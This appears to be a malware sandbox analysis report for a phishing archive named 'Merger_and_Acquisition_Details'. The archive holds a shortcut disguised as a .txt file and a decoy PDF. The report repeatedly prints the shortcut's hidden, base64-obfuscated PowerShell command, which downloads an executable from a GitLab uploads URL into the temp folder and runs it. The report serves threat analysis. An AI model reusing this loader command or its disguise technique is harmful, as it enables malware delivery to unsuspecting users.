Malicious
Malicious
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
bec053796102aace66437c22db744908
Sha1
55d4aaef34e3a7c59f2252180b28bdb383651ed3
Sha256
92d8996dca7f85e9800bdacf8b2286c7c43e791edcb503cc92c40e129c270213
Sha384
9f9686f8e3a33232ecde01f23668ac9c25df5566eca8d1cf37e7c53df01fbd7b261edd4cfed819296066073a99afc1b0
Sha512
f7afdfd60837cdde5337db28a45278b60c15afb570541f01abba0f5608cad555588a4cb17afe921eb90e84deb7ac4323379aa2cd29231cb646bba53f8493a3ce
SSDeep
768:MXCKcrDS6gvS5DRf2Sk3pFR5CvefIqS/uSlmvb846u4/RDKz8e7Qge8aHxSa0CPy:MXCLVDtIPCmf50IIt8j7QgePSJUlamSb
TLSH
4E5302D1CC65264E9B4F075FD9C6E8AEC9303A9B7A830EBC0DC72285434A4E44FA13D9
File Structure
bec053796102aace66437c22db744908
Malicious
Merger_and_Acquisition_Details
Malicious
6B63651-B1D6-417E-B687-FCDD3CBDB84.png
Merger_and_Acquisition_Details.txt.lnk
Malicious
LNK CommandLine
Malicious
[Deobfuscated PS]
Malicious
[Lnk Summary]
Malicious
[Deobfuscated PS]
Malicious
[Deobfuscated PS]
Malicious
NSI82_12.pdf
Text (Preview)
Page #1
#Stream {7}
Structure
Informations
Name
 Value
NSI82_12.pdf

1.7
NSI82_12.pdf

Wins Upgrade
NSI82_12.pdf

D:20251204082245-05'00'
NSI82_12.pdf

WPS Writer
NSI82_12.pdf

NSI82_12.pdf

D:20251204082302-05'00'
NSI82_12.pdf

NSI82_12.pdf

NSI82_12.pdf

NSI82_12.pdf

Wins Upgrade
NSI82_12.pdf

NSI82_12.pdf

NSI82_12.pdf

D:20251204082245-05'00'
NSI82_12.pdf

WPS Writer
NSI82_12.pdf

NSI82_12.pdf

D:20251204082302-05'00'
NSI82_12.pdf

NSI82_12.pdf

D:20251204082245-05'00'
NSI82_12.pdf

NSI82_12.pdf

Artefacts
Name
 Value
LNK: Command Execution

powershell.exe -WindowStyle hidden -NoExit -Command "$9023ZOC94U4RX = 'nY5XPOrfqj6AzpGvr8kGqcyJ6zTmZ2dGpuTkJFZzJTdVRtbkJFcmszNVBnUVNTZXQtQ29udGVudCAkZW52OlRFTVBcV2FpdGluZy4uICdSZXZpZXcnOyRWSHR0cXJ0d3R4aiA9ICdQN1BHSUk3MDdMUkdHQSc7JFZIdHRxcnR3dHhqID0gJ1A3UEdJSTcwN0xSR0dBJzskVkh0dHFydHd0eGogPSAnUDdQR0lJNzA3TFJHR0EnOyRWSHR0cXJ0d3R4aiA9ICdQN1BHSUk3MDdMUkdHQSc7JFZIdHRxcnR3dHhqID0gJ1A3UEdJSTcwN0xSR0dBJztTdGFydC1Qcm9jZXNzICRlbnY6VEVNUFxXYWl0aW5nLi47aXdyIC1VcmkgaHR0cHM6Ly9naXRsYWIuY29tLy0vcHJvamVjdC83Njg2OTMyMC91cGxvYWRzLzk5NWJmZjdlMmYwNTFjODNkNzdmNTE3Y2RlMjliZTc0L3NzdjMyLmV4ZSAtT3V0RmlsZSAkZW52OlRFTVBcSTZFWUFzc3YzMi5leGU7U3RhcnQtUHJvY2VzcyAkZW52OlRFTVBcSTZFWUFzc3YzMi5leGU7RXhpdA==';$NGH7J6L3YP7X = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($9023ZOC94U4RX.Substring(26)));$vnYjTQtKh = 25 + 18;$vnYjTQt
Deobfuscated PowerShell

-windowstyle "hidden" -NoExit -Command "$9023ZOC94U4RX = 'nY5XPOrfqj6AzpGvr8kGqcyJ6zTmZ2dGpuTkJFZzJTdVRtbkJFcmszNVBnUVNTZXQtQ29udGVudCAkZW52OlRFTVBcV2FpdGluZy4uICdSZXZpZXcnOyRWSHR0cXJ0d3R4aiA9ICdQN1BHSUk3MDdMUkdHQSc7JFZIdHRxcnR3dHhqID0gJ1A3UEdJSTcwN0xSR0dBJzskVkh0dHFydHd0eGogPSAnUDdQR0lJNzA3TFJHR0EnOyRWSHR0cXJ0d3R4aiA9ICdQN1BHSUk3MDdMUkdHQSc7JFZIdHRxcnR3dHhqID0gJ1A3UEdJSTcwN0xSR0dBJztTdGFydC1Qcm9jZXNzICRlbnY6VEVNUFxXYWl0aW5nLi47aXdyIC1VcmkgaHR0cHM6Ly9naXRsYWIuY29tLy0vcHJvamVjdC83Njg2OTMyMC91cGxvYWRzLzk5NWJmZjdlMmYwNTFjODNkNzdmNTE3Y2RlMjliZTc0L3NzdjMyLmV4ZSAtT3V0RmlsZSAkZW52OlRFTVBcSTZFWUFzc3YzMi5leGU7U3RhcnQtUHJvY2VzcyAkZW52OlRFTVBcSTZFWUFzc3YzMi5leGU7RXhpdA==';$NGH7J6L3YP7X = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($9023ZOC94U4RX.Substring(26)));$vnYjTQtKh = 25 + 18;$vnYjTQt"
Deobfuscated PowerShell

-windowstyle "hidden" -NoExit -Command "$9023ZOC94U4RX = 'nY5XPOrfqj6AzpGvr8kGqcyJ6zTmZ2dGpuTkJFZzJTdVRtbkJFcmszNVBnUVNTZXQtQ29udGVudCAkZW52OlRFTVBcV2FpdGluZy4uICdSZXZpZXcnOyRWSHR0cXJ0d3R4aiA9ICdQN1BHSUk3MDdMUkdHQSc7JFZIdHRxcnR3dHhqID0gJ1A3UEdJSTcwN0xSR0dBJzskVkh0dHFydHd0eGogPSAnUDdQR0lJNzA3TFJHR0EnOyRWSHR0cXJ0d3R4aiA9ICdQN1BHSUk3MDdMUkdHQSc7JFZIdHRxcnR3dHhqID0gJ1A3UEdJSTcwN0xSR0dBJztTdGFydC1Qcm9jZXNzICRlbnY6VEVNUFxXYWl0aW5nLi47aXdyIC1VcmkgaHR0cHM6Ly9naXRsYWIuY29tLy0vcHJvamVjdC83Njg2OTMyMC91cGxvYWRzLzk5NWJmZjdlMmYwNTFjODNkNzdmNTE3Y2RlMjliZTc0L3NzdjMyLmV4ZSAtT3V0RmlsZSAkZW52OlRFTVBcSTZFWUFzc3YzMi5leGU7U3RhcnQtUHJvY2VzcyAkZW52OlRFTVBcSTZFWUFzc3YzMi5leGU7RXhpdA==';$NGH7J6L3YP7X = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($9023ZOC94U4RX.Substring(26)));$vnYjTQtKh = 25 + 18;$vnYjTQt"
bec053796102aace66437c22db744908 (65.15 KB)
File Structure
bec053796102aace66437c22db744908
Malicious
Merger_and_Acquisition_Details
Malicious
6B63651-B1D6-417E-B687-FCDD3CBDB84.png
Merger_and_Acquisition_Details.txt.lnk
Malicious
LNK CommandLine
Malicious
[Deobfuscated PS]
Malicious
[Lnk Summary]
Malicious
[Deobfuscated PS]
Malicious
[Deobfuscated PS]
Malicious
NSI82_12.pdf
Text (Preview)
Page #1
#Stream {7}
Structure
Characteristics
No malware configuration were found at this point.
Artefacts
Name
 Value Location
LNK: Command Execution

powershell.exe -WindowStyle hidden -NoExit -Command "$9023ZOC94U4RX = 'nY5XPOrfqj6AzpGvr8kGqcyJ6zTmZ2dGpuTkJFZzJTdVRtbkJFcmszNVBnUVNTZXQtQ29udGVudCAkZW52OlRFTVBcV2FpdGluZy4uICdSZXZpZXcnOyRWSHR0cXJ0d3R4aiA9ICdQN1BHSUk3MDdMUkdHQSc7JFZIdHRxcnR3dHhqID0gJ1A3UEdJSTcwN0xSR0dBJzskVkh0dHFydHd0eGogPSAnUDdQR0lJNzA3TFJHR0EnOyRWSHR0cXJ0d3R4aiA9ICdQN1BHSUk3MDdMUkdHQSc7JFZIdHRxcnR3dHhqID0gJ1A3UEdJSTcwN0xSR0dBJztTdGFydC1Qcm9jZXNzICRlbnY6VEVNUFxXYWl0aW5nLi47aXdyIC1VcmkgaHR0cHM6Ly9naXRsYWIuY29tLy0vcHJvamVjdC83Njg2OTMyMC91cGxvYWRzLzk5NWJmZjdlMmYwNTFjODNkNzdmNTE3Y2RlMjliZTc0L3NzdjMyLmV4ZSAtT3V0RmlsZSAkZW52OlRFTVBcSTZFWUFzc3YzMi5leGU7U3RhcnQtUHJvY2VzcyAkZW52OlRFTVBcSTZFWUFzc3YzMi5leGU7RXhpdA==';$NGH7J6L3YP7X = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($9023ZOC94U4RX.Substring(26)));$vnYjTQtKh = 25 + 18;$vnYjTQt

Malicious

bec053796102aace66437c22db744908 > Merger_and_Acquisition_Details > Merger_and_Acquisition_Details.txt.lnk
Deobfuscated PowerShell

-windowstyle "hidden" -NoExit -Command "$9023ZOC94U4RX = 'nY5XPOrfqj6AzpGvr8kGqcyJ6zTmZ2dGpuTkJFZzJTdVRtbkJFcmszNVBnUVNTZXQtQ29udGVudCAkZW52OlRFTVBcV2FpdGluZy4uICdSZXZpZXcnOyRWSHR0cXJ0d3R4aiA9ICdQN1BHSUk3MDdMUkdHQSc7JFZIdHRxcnR3dHhqID0gJ1A3UEdJSTcwN0xSR0dBJzskVkh0dHFydHd0eGogPSAnUDdQR0lJNzA3TFJHR0EnOyRWSHR0cXJ0d3R4aiA9ICdQN1BHSUk3MDdMUkdHQSc7JFZIdHRxcnR3dHhqID0gJ1A3UEdJSTcwN0xSR0dBJztTdGFydC1Qcm9jZXNzICRlbnY6VEVNUFxXYWl0aW5nLi47aXdyIC1VcmkgaHR0cHM6Ly9naXRsYWIuY29tLy0vcHJvamVjdC83Njg2OTMyMC91cGxvYWRzLzk5NWJmZjdlMmYwNTFjODNkNzdmNTE3Y2RlMjliZTc0L3NzdjMyLmV4ZSAtT3V0RmlsZSAkZW52OlRFTVBcSTZFWUFzc3YzMi5leGU7U3RhcnQtUHJvY2VzcyAkZW52OlRFTVBcSTZFWUFzc3YzMi5leGU7RXhpdA==';$NGH7J6L3YP7X = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($9023ZOC94U4RX.Substring(26)));$vnYjTQtKh = 25 + 18;$vnYjTQt"

Malicious

bec053796102aace66437c22db744908 > Merger_and_Acquisition_Details > Merger_and_Acquisition_Details.txt.lnk > LNK CommandLine
Deobfuscated PowerShell

-windowstyle "hidden" -NoExit -Command "$9023ZOC94U4RX = 'nY5XPOrfqj6AzpGvr8kGqcyJ6zTmZ2dGpuTkJFZzJTdVRtbkJFcmszNVBnUVNTZXQtQ29udGVudCAkZW52OlRFTVBcV2FpdGluZy4uICdSZXZpZXcnOyRWSHR0cXJ0d3R4aiA9ICdQN1BHSUk3MDdMUkdHQSc7JFZIdHRxcnR3dHhqID0gJ1A3UEdJSTcwN0xSR0dBJzskVkh0dHFydHd0eGogPSAnUDdQR0lJNzA3TFJHR0EnOyRWSHR0cXJ0d3R4aiA9ICdQN1BHSUk3MDdMUkdHQSc7JFZIdHRxcnR3dHhqID0gJ1A3UEdJSTcwN0xSR0dBJztTdGFydC1Qcm9jZXNzICRlbnY6VEVNUFxXYWl0aW5nLi47aXdyIC1VcmkgaHR0cHM6Ly9naXRsYWIuY29tLy0vcHJvamVjdC83Njg2OTMyMC91cGxvYWRzLzk5NWJmZjdlMmYwNTFjODNkNzdmNTE3Y2RlMjliZTc0L3NzdjMyLmV4ZSAtT3V0RmlsZSAkZW52OlRFTVBcSTZFWUFzc3YzMi5leGU7U3RhcnQtUHJvY2VzcyAkZW52OlRFTVBcSTZFWUFzc3YzMi5leGU7RXhpdA==';$NGH7J6L3YP7X = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($9023ZOC94U4RX.Substring(26)));$vnYjTQtKh = 25 + 18;$vnYjTQt"

Malicious

bec053796102aace66437c22db744908 > Merger_and_Acquisition_Details > Merger_and_Acquisition_Details.txt.lnk > LNK CommandLine > [Deobfuscated PS]
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙